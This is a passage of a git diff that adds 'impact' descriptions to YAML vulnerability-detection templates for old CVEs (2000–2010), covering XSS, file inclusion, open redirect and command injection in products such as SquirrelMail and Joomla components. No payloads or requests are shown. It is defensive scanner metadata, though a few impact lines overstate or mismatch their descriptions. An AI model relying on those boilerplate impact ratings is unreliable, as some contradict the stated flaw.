diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index eb403449b2..084ee01d5d 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -5,6 +5,8 @@ info: author: r3naissance severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + impact: | + High: Remote code execution or denial of service. remediation: Upgrade to the latest version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index e4375cb977..e1fc7d5360 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the affected device. remediation: | Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 6af54c6cd2..01b02ba2aa 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index cefb1e2ae3..179d4f0b54 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface. remediation: Upgrade to the latest version. reference: - https://www.exploit-db.com/exploits/24068 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index c14de273e0..186f5c9a6b 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft. remediation: | Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 9a8d90ed9a..e5b51c59c8 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -5,6 +5,8 @@ info: author: CasperGN severity: medium description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + impact: | + The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security. remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index a023ce2b97..a4f726bdd6 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. + impact: | + An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system. remediation: | Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. reference: diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 95cf0166c9..b90055e566 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 1523932118..8f7380efc8 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 44fd20a1ff..8407d9ff4d 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 65247aade2..3fa16308e7 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index c7015b0ac2..ead18d7075 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 8b1892de00..75612bc84b 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + impact: | + Remote code execution remediation: | Update to the latest version of Apache Struts2 reference: diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 2765d841da..9948e70a33 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 046b971242..e310a05925 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: | Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 98b0b24f00..a9c0d135f7 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 84e9b66b44..b50e618eac 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + impact: | + An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks. remediation: | Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 49edb2bcba..8bdd43a6e1 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -5,6 +5,8 @@ info: author: unstabl3 severity: medium description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 2bcda26401..fadc7332f0 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 399ae2e350..2769d59b0c 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index dec0852cf6..ef3566fe72 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code. remediation: | Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index e14247ebdd..84180dd68e 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index f85d8602a3..4c00b5ba6f 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 4ad5b672ef..fbdc737eb6 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 76b25c9fbc..2b81d63556 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 7d28c73842..8248fdcbe2 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 6fe61a9a36..894eb7cf8b 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 077a9bc327..3dc5f17842 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. remediation: | Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 7931daeab2..6bb7021b22 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of ZeroShell. reference: diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 59c6109bdc..57f8062f33 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. reference: diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 19cf80ee3b..74bb0290d5 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. remediation: | Update PhpMyAdmin to the latest version or apply the necessary patches. reference: diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 8c7e3ecedd..6542361d15 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 621d69493b..b19eeb78ac 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 4ccde8be73..681b806249 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 7da1d0d2c5..0eeeb78f75 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). + impact: | + The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure. remediation: | Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index efd4822da4..c8b97dc4ed 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: | Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 77f8c9c527..f20685ba40 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index e458678e4b..2fe05e7751 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure. remediation: | Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. reference: diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a056354cce..0e3593637c 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 1d7023e9a8..68626cde37 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. + impact: | + An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure. remediation: | Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 9d47d0e5cd..4a34ae81cf 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 136b2f76e8..cd502f0720 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + impact: | + Allows attackers to redirect users to malicious websites or phishing pages. remediation: Apply all relevant security patches and product upgrades. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 468484b262..02a49c64fb 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + impact: | + An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/36994 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 4387e6bef7..3890bb785b 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote 